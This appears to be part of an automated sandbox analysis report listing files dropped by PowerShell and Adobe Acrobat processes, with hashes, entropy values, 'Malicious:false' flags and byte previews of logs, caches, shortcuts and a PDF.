                                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgFL4ol5ATDHj/VrOey5IEdPtYyu:6a6TZ44ADEFL4ozATDj8NtK
                                                                                          MD5:EB2E983EFD65B9769F10F5F8DD5964B4
                                                                                          SHA1:6A9E3E5465383B6B64F88CD7A40BC54B2DFE2452
                                                                                          SHA-256:5763B35F48D18BEEA8D3CD63A6532F4443B75FF4F021B8F59EE26B196919B90B
                                                                                          SHA-512:ACD7837BD871294EA7361F0FB3FA65511CED3FD3B9CE7F2B314F2ED1FA73714C7A33514B9786F45E364FD0AED12200DDD779456A4A2E76ECB160E9032B905A28
                                                                                          Malicious:false
                                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllulzych:NllUec
                                                                                          MD5:599AEF4CF899A068F1C52942AC2767D6
                                                                                          SHA1:0551ACAAAAD90D63B311551C3436A627D88F1A23
                                                                                          SHA-256:B1DB9D56B886B8A53FBCED14386BB9A9258DD0008EADA73181C655A9D4A33E30
                                                                                          SHA-512:BAFAE235810B95669C88DB19FF84A9549CB8FD66663E1DFA48B0BE15DD3F8DC177ECF970E41E0AFE82E2773EF0F2826629F47E444891A95ADF1A2400494F9B1B
                                                                                          Malicious:false
                                                                                          Preview:@...e...................................y............@..........
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):246
                                                                                          Entropy (8bit):3.5502705600366484
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlA2u:Qw946cPbiOxDlbYnuRK+u
                                                                                          MD5:1A37AF1C00713F2C0890DDD383B02B1F
                                                                                          SHA1:6C3A63A29F0B1A177832A2D58596C209197473CB
                                                                                          SHA-256:B7E1FC2B3B5452312AE0A56510F0FD33090C9799BC1F3F3268EB7A3CE8B8EDEB
                                                                                          SHA-512:A39E7B81FF4499B717176040D334CD477FAEDD631CFCAF95FC448931FA70853DF8527DEA271D83A478D15639194509179108309B13102F18488F2CC644A2A0A8
                                                                                          Malicious:false
                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.8.:.3.5. .=.=.=.....
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                          Category:dropped
                                                                                          Size (bytes):16525
                                                                                          Entropy (8bit):5.386483451061953
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                          MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                          SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                          SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                          SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                          Malicious:false
                                                                                          Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):15114
                                                                                          Entropy (8bit):5.36289179225622
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hZvo2Yjxy7+Qr5dzwE7HP0IxtSUtDxhpdG4mM0GCTQeoiVOvtUgHtgt0xf4Pat14:KyE
                                                                                          MD5:4A79B964F111A04BC92D52D76E59BEFC
                                                                                          SHA1:6CB6A54979A021C76E41B23FDB7DD01572663804
                                                                                          SHA-256:F0276CD1C495392F0F00A758A7FCFE5ED7C4EF35BA3EB3F73BA8A6F727695BD9
                                                                                          SHA-512:18D46ED67784ED4A1363DD6AF281CC1707378D43E606F1C2BF3E4074FC5528C48CAE2D3626128435AF07B9CFFE073101AC4DBF1559B8428594E4F71D72CFA10E
                                                                                          Malicious:false
                                                                                          Preview:SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:933-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:938-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=84ae157b-9565-4165-9fa4-dd0f683a5e11.1734608909933 Timestamp=2024-12-19T06:48:29:939-0500 ThreadID=7128 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):35721
                                                                                          Entropy (8bit):5.420257763499499
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRye:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRD
                                                                                          MD5:A659CD9A9B061D13076AAA7D384141AC
                                                                                          SHA1:7A123243014203E6DDF4B783D568122EFBE08377
                                                                                          SHA-256:971AD7A358BB38B7D5E06E6BD8DB880470978D20398BE820DF47DA3707C7466A
                                                                                          SHA-512:B7532E1C8A78C9C8891CA459BCD3CE4B75AA36D7FF1BB3C35EB0D97ECD678A5A161F2A5833C2EE0523190E4BC59DAF579B1E3CFB343AE2B758EF4759BCEC45BA
                                                                                          Malicious:false
                                                                                          Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                          Category:dropped
                                                                                          Size (bytes):386528
                                                                                          Entropy (8bit):7.9736851559892425
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                          Malicious:false
                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                          Category:dropped
                                                                                          Size (bytes):1407294
                                                                                          Entropy (8bit):7.97605879016224
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                          Category:dropped
                                                                                          Size (bytes):758601
                                                                                          Entropy (8bit):7.98639316555857
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                          MD5:3A49135134665364308390AC398006F1
                                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                          Malicious:false
                                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                          Category:dropped
                                                                                          Size (bytes):1419751
                                                                                          Entropy (8bit):7.976496077007677
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru
                                                                                          MD5:CDB0A9F62FD4871F0603FBBF1FE6BD06
                                                                                          SHA1:C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24
                                                                                          SHA-256:85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F
                                                                                          SHA-512:7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28
                                                                                          Malicious:false
                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6225
                                                                                          Entropy (8bit):3.7354375835875424
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Xb/26kIFCbU203wukvhkvklCywUgo/Zl6iSogZoXJdJaAo/Zl0iSogZoXJdJO1:rO6zFCwrZkvhkvCCtto/ZaHio/ZAHv
                                                                                          MD5:4CA6F687437F97D3A2123762E0E369DD
                                                                                          SHA1:CDD272452B694A0E786177308E6A54395F8BD159
                                                                                          SHA-256:6B91AC91921DE5D0652EE38F46F60DC6B5F0EFC220CFDDEF4A6BF11B48C82817
                                                                                          SHA-512:157CBAB3115E54494DE72E54BA040C9739BD13CADECAD5E5461355FC6EFE870B80C7A684060EF1489D2B6A7D8392948125BE04B2BB1515E38941F2206CBA91AB
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. .....*_....$...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........R......R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.^..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW.=.Y.^...........................]3.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.^..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.^..........................m...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.^....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.^....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.^....9...........
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6225
                                                                                          Entropy (8bit):3.7354375835875424
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:Xb/26kIFCbU203wukvhkvklCywUgo/Zl6iSogZoXJdJaAo/Zl0iSogZoXJdJO1:rO6zFCwrZkvhkvCCtto/ZaHio/ZAHv
                                                                                          MD5:4CA6F687437F97D3A2123762E0E369DD
                                                                                          SHA1:CDD272452B694A0E786177308E6A54395F8BD159
                                                                                          SHA-256:6B91AC91921DE5D0652EE38F46F60DC6B5F0EFC220CFDDEF4A6BF11B48C82817
                                                                                          SHA-512:157CBAB3115E54494DE72E54BA040C9739BD13CADECAD5E5461355FC6EFE870B80C7A684060EF1489D2B6A7D8392948125BE04B2BB1515E38941F2206CBA91AB
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. .....*_....$...R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_........R......R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.^..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW.=.Y.^...........................]3.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.^..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.^..........................m...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.^....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.^....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.^....9...........
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                          Category:dropped
                                                                                          Size (bytes):871324
                                                                                          Entropy (8bit):7.827941732382635
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                          MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                          SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                          SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                          SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                          Malicious:false
